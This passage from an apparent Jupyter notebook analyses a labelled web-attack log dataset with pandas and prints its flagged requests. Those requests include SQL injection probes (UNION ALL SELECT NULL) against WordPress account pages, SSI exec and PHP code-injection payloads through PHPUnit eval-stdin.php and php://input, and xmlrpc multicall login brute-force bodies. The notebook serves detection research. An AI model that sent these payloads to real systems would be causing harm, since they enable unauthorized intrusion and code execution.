password_current=5Padk!#F&password_1=5Padk!#F&password_2=5Padk!#F&_wpnonce=b9dad6a8b5&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&save_change_password=Save+changes%22+UNION+ALL+select+NULL+--+&action=save_change_password
----------------------------------------------------------------------------------------------------
Index: 149650

In [39]:
pd.set_option("display.max_colwidth", None)

for idx, body in sql_injection_bodies["request_http_request"].items():
    if "UNION" in str(body):
        print(f"Index: {idx}")
        print(body)
        print("-" * 100)

Index: 149959
/blog+UNION+ALL+select+NULL+--+/index.php/my-account/edit-password
----------------------------------------------------------------------------------------------------
Index: 149960
/blog%27+UNION+ALL+select+NULL+--+/index.php/my-account/edit-password
----------------------------------------------------------------------------------------------------
Index: 149961
/blog%22+UNION+ALL+select+NULL+--+/index.php/my-account/edit-password
----------------------------------------------------------------------------------------------------
Index: 149962
/blog%29+UNION+ALL+select+NULL+--+/index.php/my-account/edit-password
----------------------------------------------------------------------------------------------------
Index: 149963
/blog%27%29+UNION+ALL+select+NULL+--+/index.php/my-account/edit-password
----------------------------------------------------------------------------------------------------
Index: 149964
/blog%22%29+UNION+ALL+select+NULL+--+/index.php/my-account/edit-password
----------------------------------------------------------------------------------------------------
Index: 149998
/blog/index.php+UNION+ALL+select+NULL+--+/my-account/edit-password
----------------------------------------------------------------------------------------------------
Index: 149999
/blog/index.php%27+UNION+ALL+select+NULL+--+/my-account/edit-password
----------------------------------------------------------------------------------------------------
Index: 150000
/blog/index.php%22+UNION+ALL+select+NULL+--+/my-account/edit-password
----------------------------------------------------------------------------------------------------
Index: 150001
/blog/index.php%29+UNION+ALL+select+NULL+--+/my-account/edit-password
----------------------------------------------------------------------------------------------------
Index: 150002
/blog/index.php%27%29+UNION+ALL+select+NULL+--+/my-account/edit-password
----------------------------------------------------------------------------------------------------
Index: 150004
/blog/index.php%22%29+UNION+ALL+select+NULL+--+/my-account/edit-password
----------------------------------------------------------------------------------------------------
Index: 150051
/blog+UNION+ALL+select+NULL+--+/index.php/my-account/edit-password
----------------------------------------------------------------------------------------------------
Index: 150053
/blog%27+UNION+ALL+select+NULL+--+/index.php/my-account/edit-password
----------------------------------------------------------------------------------------------------
Index: 150055
/blog%22+UNION+ALL+select+NULL+--+/index.php/my-account/edit-password
----------------------------------------------------------------------------------------------------
Index: 150057
/blog%29+UNION+ALL+select+NULL+--+/index.php/my-account/edit-password
----------------------------------------------------------------------------------------------------
Index: 150059
/blog%27%29+UNION+ALL+select+NULL+--+/index.php/my-account/edit-password
----------------------------------------------------------------------------------------------------
Index: 150060
/blog/index.php/my-account+UNION+ALL+select+NULL+--+/edit-password
----------------------------------------------------------------------------------------------------
Index: 150061
/blog%22%29+UNION+ALL+select+NULL+--+/index.php/my-account/edit-password
----------------------------------------------------------------------------------------------------
Index: 150062
/blog/index.php/my-account%27+UNION+ALL+select+NULL+--+/edit-password
----------------------------------------------------------------------------------------------------
Index: 150063
/blog/index.php/my-account%22+UNION+ALL+select+NULL+--+/edit-password
----------------------------------------------------------------------------------------------------
Index: 150065
/blog/index.php/my-account%29+UNION+ALL+select+NULL+--+/edit-password
----------------------------------------------------------------------------------------------------
Index: 150067
/blog/index.php/my-account%27%29+UNION+ALL+select+NULL+--+/edit-password
----------------------------------------------------------------------------------------------------
Index: 150069
/blog/index.php/my-account%22%29+UNION+ALL+select+NULL+--+/edit-password
----------------------------------------------------------------------------------------------------
Index: 150112
/blog/index.php+UNION+ALL+select+NULL+--+/my-account/edit-password
----------------------------------------------------------------------------------------------------
Index: 150114
/blog/index.php%27+UNION+ALL+select+NULL+--+/my-account/edit-password
----------------------------------------------------------------------------------------------------
Index: 150116
/blog/index.php%22+UNION+ALL+select+NULL+--+/my-account/edit-password
----------------------------------------------------------------------------------------------------
Index: 150118
/blog/index.php%29+UNION+ALL+select+NULL+--+/my-account/edit-password
----------------------------------------------------------------------------------------------------
Index: 150120
/blog/index.php%27%29+UNION+ALL+select+NULL+--+/my-account/edit-password
----------------------------------------------------------------------------------------------------
Index: 150122
/blog/index.php%22%29+UNION+ALL+select+NULL+--+/my-account/edit-password
----------------------------------------------------------------------------------------------------
Index: 150125
/blog/index.php/my-account/edit-password+UNION+ALL+select+NULL+--+
----------------------------------------------------------------------------------------------------
Index: 150127
/blog/index.php/my-account/edit-password%27+UNION+ALL+select+NULL+--+
----------------------------------------------------------------------------------------------------
Index: 150128
/blog/index.php/my-account/edit-password%22+UNION+ALL+select+NULL+--+
----------------------------------------------------------------------------------------------------
Index: 150129
/blog/index.php/my-account/edit-password%29+UNION+ALL+select+NULL+--+
----------------------------------------------------------------------------------------------------
Index: 150130
/blog/index.php/my-account/edit-password%27%29+UNION+ALL+select+NULL+--+
----------------------------------------------------------------------------------------------------
Index: 150131
/blog/index.php/my-account/edit-password%22%29+UNION+ALL+select+NULL+--+
----------------------------------------------------------------------------------------------------
Index: 150188
/blog/index.php/my-account+UNION+ALL+select+NULL+--+/edit-password
----------------------------------------------------------------------------------------------------
Index: 150190
/blog/index.php/my-account%27+UNION+ALL+select+NULL+--+/edit-password
----------------------------------------------------------------------------------------------------
Index: 150192
/blog/index.php/my-account%22+UNION+ALL+select+NULL+--+/edit-password
----------------------------------------------------------------------------------------------------
Index: 150194
/blog/index.php/my-account%29+UNION+ALL+select+NULL+--+/edit-password
----------------------------------------------------------------------------------------------------
Index: 150196
/blog/index.php/my-account%27%29+UNION+ALL+select+NULL+--+/edit-password
----------------------------------------------------------------------------------------------------
Index: 150198
/blog/index.php/my-account%22%29+UNION+ALL+select+NULL+--+/edit-password
----------------------------------------------------------------------------------------------------
Index: 150255
/blog/index.php/my-account/edit-password+UNION+ALL+select+NULL+--+
----------------------------------------------------------------------------------------------------
Index: 150257
/blog/index.php/my-account/edit-password%27+UNION+ALL+select+NULL+--+
----------------------------------------------------------------------------------------------------
Index: 150259
/blog/index.php/my-account/edit-password%22+UNION+ALL+select+NULL+--+
----------------------------------------------------------------------------------------------------
Index: 150261
/blog/index.php/my-account/edit-password%29+UNION+ALL+select+NULL+--+
----------------------------------------------------------------------------------------------------
Index: 150263
/blog/index.php/my-account/edit-password%27%29+UNION+ALL+select+NULL+--+
----------------------------------------------------------------------------------------------------
Index: 150267
/blog/index.php/my-account/edit-password%22%29+UNION+ALL+select+NULL+--+
----------------------------------------------------------------------------------------------------
Index: 150426
/blog/index.php/my-account/edit-profile/post.php/?action=edit+UNION+ALL+select+NULL+--+&post=%7B%7B+data.id+%7D%7D
----------------------------------------------------------------------------------------------------
Index: 150428
/blog/index.php/my-account/edit-profile/post.php/?action=edit%27+UNION+ALL+select+NULL+--+&post=%7B%7B+data.id+%7D%7D
----------------------------------------------------------------------------------------------------
Index: 150430
/blog/index.php/my-account/edit-profile/post.php/?action=edit%22+UNION+ALL+select+NULL+--+&post=%7B%7B+data.id+%7D%7D
----------------------------------------------------------------------------------------------------
Index: 150432
/blog/index.php/my-account/edit-profile/post.php/?action=edit%29+UNION+ALL+select+NULL+--+&post=%7B%7B+data.id+%7D%7D
----------------------------------------------------------------------------------------------------
Index: 150434
/blog/index.php/my-account/edit-profile/post.php/?action=edit%27%29+UNION+ALL+select+NULL+--+&post=%7B%7B+data.id+%7D%7D
----------------------------------------------------------------------------------------------------
Index: 150436
/blog/index.php/my-account/edit-profile/post.php/?action=edit%22%29+UNION+ALL+select+NULL+--+&post=%7B%7B+data.id+%7D%7D
----------------------------------------------------------------------------------------------------
Index: 150464
/blog/index.php/my-account/edit-profile/post.php/?action=edit&post=%7B%7B+data.id+%7D%7D+UNION+ALL+select+NULL+--+
----------------------------------------------------------------------------------------------------
Index: 150465
/blog/index.php/my-account/edit-profile/post.php/?action=edit&post=%7B%7B+data.id+%7D%7D%27+UNION+ALL+select+NULL+--+
----------------------------------------------------------------------------------------------------
Index: 150466
/blog/index.php/my-account/edit-profile/post.php/?action=edit&post=%7B%7B+data.id+%7D%7D%22+UNION+ALL+select+NULL+--+
----------------------------------------------------------------------------------------------------
Index: 150467
/blog/index.php/my-account/edit-profile/post.php/?action=edit&post=%7B%7B+data.id+%7D%7D%29+UNION+ALL+select+NULL+--+
----------------------------------------------------------------------------------------------------
Index: 150468
/blog/index.php/my-account/edit-profile/post.php/?action=edit&post=%7B%7B+data.id+%7D%7D%27%29+UNION+ALL+select+NULL+--+
----------------------------------------------------------------------------------------------------
Index: 150469
/blog/index.php/my-account/edit-profile/post.php/?action=edit&post=%7B%7B+data.id+%7D%7D%22%29+UNION+ALL+select+NULL+--+
----------------------------------------------------------------------------------------------------
Index: 151119
/blog+UNION+ALL+select+NULL+--+/index.php/my-account/edit-profile/post.php?action=edit&post=%7B%7B%20data.id%20%7D%7D
----------------------------------------------------------------------------------------------------
Index: 151121
/blog%27+UNION+ALL+select+NULL+--+/index.php/my-account/edit-profile/post.php?action=edit&post=%7B%7B%20data.id%20%7D%7D
----------------------------------------------------------------------------------------------------
Index: 151124
/blog%22+UNION+ALL+select+NULL+--+/index.php/my-account/edit-profile/post.php?action=edit&post=%7B%7B%20data.id%20%7D%7D
----------------------------------------------------------------------------------------------------
Index: 151125
/blog%29+UNION+ALL+select+NULL+--+/index.php/my-account/edit-profile/post.php?action=edit&post=%7B%7B%20data.id%20%7D%7D
----------------------------------------------------------------------------------------------------
Index: 151127
/blog%27%29+UNION+ALL+select+NULL+--+/index.php/my-account/edit-profile/post.php?action=edit&post=%7B%7B%20data.id%20%7D%7D
----------------------------------------------------------------------------------------------------
Index: 151129
/blog%22%29+UNION+ALL+select+NULL+--+/index.php/my-account/edit-profile/post.php?action=edit&post=%7B%7B%20data.id%20%7D%7D
----------------------------------------------------------------------------------------------------
Index: 151199
/blog/index.php+UNION+ALL+select+NULL+--+/my-account/edit-profile/post.php?action=edit&post=%7B%7B%20data.id%20%7D%7D
----------------------------------------------------------------------------------------------------
Index: 151201
/blog/index.php%27+UNION+ALL+select+NULL+--+/my-account/edit-profile/post.php?action=edit&post=%7B%7B%20data.id%20%7D%7D
----------------------------------------------------------------------------------------------------
Index: 151203
/blog/index.php%22+UNION+ALL+select+NULL+--+/my-account/edit-profile/post.php?action=edit&post=%7B%7B%20data.id%20%7D%7D
----------------------------------------------------------------------------------------------------
Index: 151204
/blog/index.php%29+UNION+ALL+select+NULL+--+/my-account/edit-profile/post.php?action=edit&post=%7B%7B%20data.id%20%7D%7D
----------------------------------------------------------------------------------------------------
Index: 151206
/blog/index.php%27%29+UNION+ALL+select+NULL+--+/my-account/edit-profile/post.php?action=edit&post=%7B%7B%20data.id%20%7D%7D
----------------------------------------------------------------------------------------------------
Index: 151208
/blog/index.php%22%29+UNION+ALL+select+NULL+--+/my-account/edit-profile/post.php?action=edit&post=%7B%7B%20data.id%20%7D%7D
----------------------------------------------------------------------------------------------------
Index: 151259
/blog/index.php/my-account+UNION+ALL+select+NULL+--+/edit-profile/post.php?action=edit&post=%7B%7B%20data.id%20%7D%7D
----------------------------------------------------------------------------------------------------
Index: 151261
/blog/index.php/my-account%27+UNION+ALL+select+NULL+--+/edit-profile/post.php?action=edit&post=%7B%7B%20data.id%20%7D%7D
----------------------------------------------------------------------------------------------------
Index: 151263
/blog/index.php/my-account%22+UNION+ALL+select+NULL+--+/edit-profile/post.php?action=edit&post=%7B%7B%20data.id%20%7D%7D
----------------------------------------------------------------------------------------------------
Index: 151265
/blog/index.php/my-account%29+UNION+ALL+select+NULL+--+/edit-profile/post.php?action=edit&post=%7B%7B%20data.id%20%7D%7D
----------------------------------------------------------------------------------------------------
Index: 151267
/blog/index.php/my-account%27%29+UNION+ALL+select+NULL+--+/edit-profile/post.php?action=edit&post=%7B%7B%20data.id%20%7D%7D
----------------------------------------------------------------------------------------------------
Index: 151269
/blog/index.php/my-account%22%29+UNION+ALL+select+NULL+--+/edit-profile/post.php?action=edit&post=%7B%7B%20data.id%20%7D%7D
----------------------------------------------------------------------------------------------------
Index: 151320
/blog/index.php/my-account/edit-profile+UNION+ALL+select+NULL+--+/post.php?action=edit&post=%7B%7B%20data.id%20%7D%7D
----------------------------------------------------------------------------------------------------
Index: 151321
/blog/index.php/my-account/edit-profile%27+UNION+ALL+select+NULL+--+/post.php?action=edit&post=%7B%7B%20data.id%20%7D%7D
----------------------------------------------------------------------------------------------------
Index: 151322
/blog/index.php/my-account/edit-profile%22+UNION+ALL+select+NULL+--+/post.php?action=edit&post=%7B%7B%20data.id%20%7D%7D
----------------------------------------------------------------------------------------------------
Index: 151323
/blog/index.php/my-account/edit-profile%29+UNION+ALL+select+NULL+--+/post.php?action=edit&post=%7B%7B%20data.id%20%7D%7D
----------------------------------------------------------------------------------------------------
Index: 151324
/blog/index.php/my-account/edit-profile%27%29+UNION+ALL+select+NULL+--+/post.php?action=edit&post=%7B%7B%20data.id%20%7D%7D
----------------------------------------------------------------------------------------------------
Index: 151325
/blog/index.php/my-account/edit-profile%22%29+UNION+ALL+select+NULL+--+/post.php?action=edit&post=%7B%7B%20data.id%20%7D%7D
----------------------------------------------------------------------------------------------------
Index: 151345
/blog/index.php/my-account/edit-profile/post.php+UNION+ALL+select+NULL+--+?action=edit&post=%7B%7B%20data.id%20%7D%7D
----------------------------------------------------------------------------------------------------
Index: 151346
/blog/index.php/my-account/edit-profile/post.php%27+UNION+ALL+select+NULL+--+?action=edit&post=%7B%7B%20data.id%20%7D%7D
----------------------------------------------------------------------------------------------------
Index: 151347
/blog/index.php/my-account/edit-profile/post.php%22+UNION+ALL+select+NULL+--+?action=edit&post=%7B%7B%20data.id%20%7D%7D
----------------------------------------------------------------------------------------------------
Index: 151348
/blog/index.php/my-account/edit-profile/post.php%29+UNION+ALL+select+NULL+--+?action=edit&post=%7B%7B%20data.id%20%7D%7D
----------------------------------------------------------------------------------------------------
Index: 151349
/blog/index.php/my-account/edit-profile/post.php%27%29+UNION+ALL+select+NULL+--+?action=edit&post=%7B%7B%20data.id%20%7D%7D
----------------------------------------------------------------------------------------------------
Index: 151350
/blog/index.php/my-account/edit-profile/post.php%22%29+UNION+ALL+select+NULL+--+?action=edit&post=%7B%7B%20data.id%20%7D%7D
----------------------------------------------------------------------------------------------------
Index: 155751
/blog+UNION+ALL+select+NULL+--+/index.php/my-account/edit-profile
----------------------------------------------------------------------------------------------------
Index: 155753
/blog%27+UNION+ALL+select+NULL+--+/index.php/my-account/edit-profile
----------------------------------------------------------------------------------------------------
Index: 155755
/blog%22+UNION+ALL+select+NULL+--+/index.php/my-account/edit-profile
----------------------------------------------------------------------------------------------------
Index: 155757
/blog%29+UNION+ALL+select+NULL+--+/index.php/my-account/edit-profile
----------------------------------------------------------------------------------------------------
Index: 155758
/blog%27%29+UNION+ALL+select+NULL+--+/index.php/my-account/edit-profile
----------------------------------------------------------------------------------------------------
Index: 155760
/blog%22%29+UNION+ALL+select+NULL+--+/index.php/my-account/edit-profile
----------------------------------------------------------------------------------------------------
Index: 155815
/blog/index.php+UNION+ALL+select+NULL+--+/my-account/edit-profile

In [ ]:
code_injection_bodies = df.loc[
    (df["242 - Code Injection"] == 1) & df["request_body"].notna(),
    ["request_http_request", "request_body"]
]

code_injection_bodies

,timestamp,request_http_request,request_body,242 - Code Injection,request_http_method
2940,17/Jul/2020:19:01:39 +0200,/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php,"<?=md5(""phpunit"")?>",1,POST
4744,17/Jul/2020:19:35:52 +0200,/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input,<?php system('echo NmapCVEIdentification');die(); ?>,1,POST
103920,17/Jul/2020:23:29:11 +0200,/blog/index.php/my-account/edit-password/,password_current=%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&password_1=sWvvTlQ1&password_2=sWvvTlQ1&_wpnonce=b9dad6a8b5&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&save_change_password=Save+changes&action=save_change_password,1,POST
103923,17/Jul/2020:23:29:12 +0200,/blog/index.php/my-account/edit-password/,password_current=%22%3E%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E%3C&password_1=!PZPgpdn&password_2=!PZPgpdn&_wpnonce=b9dad6a8b5&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&save_change_password=Save+changes&action=save_change_password,1,POST
103925,17/Jul/2020:23:29:12 +0200,/blog/index.php/my-account/edit-password/,password_current=tNCEQiU&password_1=%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&password_2=tNCEQiU&_wpnonce=b9dad6a8b5&_wp_http_referer=%2Fblog%2Findex.php%2Fmy-account%2Fedit-password%2F&save_change_password=Save+changes&action=save_change_password,1,POST
...,...,...,...,...,...
544878,19/Jul/2020:22:33:11 +0200,/xmlrpc.php,"<?xml version=""1.0""?><methodCall><methodName>system.multicall</methodName><params><param><value><array><data><value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>[login]</string></value><value><string></string></value></data></array></value></data></array></value></member></struct></value></data></array></value></param></params></methodCall>",1,POST
544883,19/Jul/2020:22:39:42 +0200,/xmlrpc.php,"<?xml version=""1.0""?><methodCall><methodName>system.multicall</methodName><params><param><value><array><data><value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>[login]</string></value><value><string></string></value></data></array></value></data></array></value></member></struct></value></data></array></value></param></params></methodCall>",1,POST
544888,19/Jul/2020:22:46:32 +0200,/xmlrpc.php,"<?xml version=""1.0""?><methodCall><methodName>system.multicall</methodName><params><param><value><array><data><value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>[login]</string></value><value><string></string></value></data></array></value></data></array></value></member></struct></value></data></array></value></param></params></methodCall>",1,POST
544893,19/Jul/2020:22:52:17 +0200,/xmlrpc.php,"<?xml version=""1.0""?><methodCall><methodName>system.multicall</methodName><params><param><value><array><data><value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>[login]</string></value><value><string></string></value></data></array></value></data></array></value></member></struct></value></data></array></value></param></params></methodCall>",1,POST
544898,01/Nov/2020:12:23:34 +0100,/,"<?xml version=""1.0""?><methodCall><methodName>system.multicall</methodName><params><param><value><array><data><value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>[login]</string></value><value><string>[login]2018</string></value></data></array></value></data></array></value></member></struct></value></data></array></value></param></params></methodCall>",1,GET

In [58]:
code_injection_bodies["request_http_method"].value_counts()

request_http_method
POST    1954
GET        1
Name: count, dtype: int64

In [26]:
pd.set_option("display.max_colwidth", None)

code_injection_terms = ["<script", "<?php", "{{", "}}", "eval(", "alert("]

for idx, body in code_injection_bodies["request_body"].items():
    if any(term.lower() in str(body).lower() for term in code_injection_terms):
        print(f"Index: {idx}")
        print(body)
        print("-" * 100)

Index: 4744
<?php system('echo NmapCVEIdentification');die(); ?>
----------------------------------------------------------------------------------------------------
Index: 369611
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369612
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369613
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369614
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369615
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369616
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369617
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369618
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369619
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369620
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369621
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369622
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369623
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369624
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369625
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369626
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369627
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369628
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369629
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369630
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369631
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369632
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369633
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369634
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369635
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369636
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369637
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369638
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369639
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369640
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369641
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369642
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369643
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369644
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369645
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369646
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369647
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369648
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369649
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369650
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369651
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369652
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369653
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369654
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369655
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369656
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369657
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369658
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369659
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369660
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369661
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369662
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369663
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369664
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369665
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369666
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369667
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369668
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369669
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369670
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369671
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369672
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369673
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369674
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369675
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369676
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369677
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369678
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369679
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369680
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369681
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369682
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369683
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369684
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369685
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369686
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369687
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369688
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369689
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369690
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369691
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369692
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369693
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369694
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369695
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369696
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369697
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369698
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
----------------------------------------------------------------------------------------------------
Index: 369699
<?php exec('echo jrpkjls7ygpnhzkjcebd',$colm);echo join("
